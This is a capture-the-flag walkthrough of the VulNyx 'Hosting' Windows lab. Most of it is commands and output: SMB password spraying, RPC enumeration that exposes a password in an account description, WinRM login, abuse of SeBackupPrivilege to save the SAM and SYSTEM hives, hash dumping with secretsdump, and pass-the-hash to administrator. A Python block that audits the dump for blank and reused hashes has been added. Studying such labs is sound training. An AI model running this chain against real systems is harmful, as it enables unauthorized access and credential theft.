VulNyx Hosting Walkthrough

Another Windows target machine; the download is at https://vulnyx.com/file/Hosting.php.
Tips: SMB, rpcclient, exporting HKLM hives via backup privileges, and a few common Windows command-line tools.

Port scan: 80 and SMB are open, along with a pile of RPC ports.

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 21:11 CST
Nmap scan report for 192.168.56.149
Host is up (0.00040s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:B4:BE:70 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

With port 80 open, the usual first step is to visit the site and then brute-force directories.

└─$ gobuster dir -u http://$IP -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500  -o 80.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   401,403,404,500
[+] User Agent:              gobuster/3.6
[+] Extensions:              aspx,txt,html,php,asp
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/speed                (Status: 301) [Size: 162] [--> http://192.168.56.149/speed/]
/Speed                (Status: 301) [Size: 162] [--> http://192.168.56.149/Speed/]

Under /speed there is a website.

└─$ gobuster dir -u http://$IP/speed -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500  -o 80_speed.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149/speed
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,500,401,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              aspx,txt,html,php,asp
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 169] [--> http://192.168.56.149/speed/images/]
/index.html           (Status: 200) [Size: 29831]
/Images               (Status: 301) [Size: 169] [--> http://192.168.56.149/speed/Images/]
/css                  (Status: 301) [Size: 166] [--> http://192.168.56.149/speed/css/]
/Index.html           (Status: 200) [Size: 29831]
/js                   (Status: 301) [Size: 165] [--> http://192.168.56.149/speed/js/]
/fonts                (Status: 301) [Size: 168] [--> http://192.168.56.149/speed/fonts/]
/IMAGES               (Status: 301) [Size: 169] [--> http://192.168.56.149/speed/IMAGES/]
/INDEX.html           (Status: 200) [Size: 29831]
/Fonts                (Status: 301) [Size: 168] [--> http://192.168.56.149/speed/Fonts/]
/CSS                  (Status: 301) [Size: 166] [--> http://192.168.56.149/speed/CSS/]
/JS                   (Status: 301) [Size: 165] [--> http://192.168.56.149/speed/JS/]

The page lists four people's names. This is the only clue the site provides, and there is no other dynamic entry point.

The names need to be rewritten in the abbreviated form (first initial, dot, surname, the usual Western convention) and put into a wordlist file.

└─$ cat user.txt                                                        
p.smith
a.krist
m.faeny
k.lendy

Spraying these usernames against SMB yields p.smith's password.

└─$ crackmapexec smb $IP -u user.txt -p /usr/share/wordlists/rockyou.txt
SMB         192.168.56.149  445    HOSTING          [+] HOSTING\p.smith:kissme

└─$ smbclient -L $IP -U p.smith%kissme   

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Admin remota
        C$              Disk      Recurso predeterminado
        IPC$            IPC       IPC remota

Nothing useful was found over SMB, and p.smith cannot log in over WinRM, but can connect via RPC. Browsing the RPC information reveals an additional username, j.wilson, together with a string that looks like a password.

└─$ rpcclient  -U p.smith $IP 
Password for [WORKGROUP\p.smith]:
rpcclient $> enumdomusers
user:[Administrador] rid:[0x1f4]
user:[administrator] rid:[0x3ea]
user:[DefaultAccount] rid:[0x1f7]
user:[f.miller] rid:[0x3ec]
user:[Invitado] rid:[0x1f5]
user:[j.wilson] rid:[0x3ee]
user:[m.davis] rid:[0x3ed]
user:[p.smith] rid:[0x3eb]
user:[WDAGUtilityAccount] rid:[0x1f8]
rpcclient $> querydispinfo
index: 0x1 RID: 0x1f4 acb: 0x00000211 Account: Administrador    Name: (null)    Desc: (null)
index: 0x2 RID: 0x3ea acb: 0x00000214 Account: administrator    Name: Administrator     Desc: (null)
index: 0x3 RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount   Name: (null)    Desc: (null)
index: 0x4 RID: 0x3ec acb: 0x00000214 Account: f.miller Name: Frank Miller      Desc: (null)
index: 0x5 RID: 0x1f5 acb: 0x00000215 Account: Invitado Name: (null)    Desc: (null)
index: 0x6 RID: 0x3ee acb: 0x00000214 Account: j.wilson Name: John Wilson       Desc: (null)
index: 0x7 RID: 0x3ed acb: 0x00000214 Account: m.davis  Name: Mike Davis        Desc: H0$T1nG123!
index: 0x8 RID: 0x3eb acb: 0x00000214 Account: p.smith  Name: Paul Smith        Desc: (null)
index: 0x9 RID: 0x1f8 acb: 0x00000011 Account: WDAGUtilityAccount       Name: (null)    Desc: (null)

Add j.wilson to the username list built earlier and test it with the password string just found; sure enough, it logs in over WinRM.

└─$ echo j.wilson >> user.txt
└─$ netexec winrm $IP -u user.txt -p 'H0$T1nG123!'
WINRM       192.168.56.149  5985   HOSTING          [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\p.smith:H0$T1nG123!
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\a.krist:H0$T1nG123!
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\m.faeny:H0$T1nG123!
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\k.lendy:H0$T1nG123!
WINRM       192.168.56.149  5985   HOSTING          [+] HOSTING\j.wilson:H0$T1nG123! (Pwn3d!)

└─$ evil-winrm -i $IP -u j.wilson  -p 'H0$T1nG123!'          

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami
hosting\j.wilson

With a user shell, the next step is to see what privileges j.wilson holds. SeBackupPrivilege is the important one: it means the account can back up (export) the SAM and other critical hives.

*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami /priv

INFORMACIÓN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripción                                         Estado
============================= =================================================== ==========
SeBackupPrivilege             Hacer copias de seguridad de archivos y directorios Habilitada
SeRestorePrivilege            Restaurar archivos y directorios                    Habilitada
SeShutdownPrivilege           Apagar el sistema                                   Habilitada
SeChangeNotifyPrivilege       Omitir comprobación de recorrido                    Habilitada
SeUndockPrivilege             Quitar equipo de la estación de acoplamiento        Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso        Habilitada
SeTimeZonePrivilege           Cambiar la zona horaria                             Habilitada

Export the SAM and SYSTEM hives, then download them to the local machine via evil-winrm.

*Evil-WinRM* PS C:\Users\j.wilson\Documents> reg save hklm\sam sam
La operación se completó correctamente.

*Evil-WinRM* PS C:\Users\j.wilson\Documents> reg save hklm\system system
La operación se completó correctamente.

Info: Downloading C:\Users\j.wilson\Documents\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Users\j.wilson\Documents> download system

Info: Downloading C:\Users\j.wilson\Documents\system to system

Info: Download successful!

Use the impacket script locally to read the SAM and SYSTEM hives and obtain the administrator's hash.

└─$ impacket-secretsdump LOCAL -system system -sam sam 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
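The dump above carries two things a password audit should catch: the RID 500 account holds the empty-string NT hash (31d6cfe0d16ae931b73c59d7e0c089c0), and f.miller and m.davis share an identical NT hash, i.e. the same password. The following added Python (not from the original post or from VulNyx) parses secretsdump's `user:rid:lmhash:nthash:::` lines and flags both conditions; the embedded sample is constructed from the lines shown above.

```python
import re
from collections import defaultdict

# NT hash of the empty string. A normal account with this hash has a blank
# password; for the built-in RID 500 account it commonly means "disabled".
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in impacket-secretsdump's output format
# (uid:rid:lmhash:nthash:::), taken from the dump shown in the walkthrough.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
"""

# One SAM line: user, numeric RID, 32-hex LM hash, 32-hex NT hash, ":::" trailer.
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text):
    """Return (user, rid, nt_hash) tuples; banner and non-matching lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["nt"].lower()))
    return rows


def audit(rows):
    """Flag accounts with a blank password and NT hashes shared by several accounts."""
    blank = sorted(user for user, _, nt in rows if nt == EMPTY_NT_HASH)
    by_hash = defaultdict(list)
    for user, _, nt in rows:
        if nt != EMPTY_NT_HASH:  # blank passwords are reported separately
            by_hash[nt].append(user)
    reused = {nt: sorted(users) for nt, users in by_hash.items() if len(users) > 1}
    return {"blank_password": blank, "reused_hash": reused}


if __name__ == "__main__":
    print(audit(parse_dump(SAMPLE_DUMP)))
```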

Log in with the administrator's hash to get an administrator shell.

└─$ evil-winrm -i $IP -u administrator  -H 41186fb28e283ff758bb3dbeb6fb4a5c

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
hosting\administrator
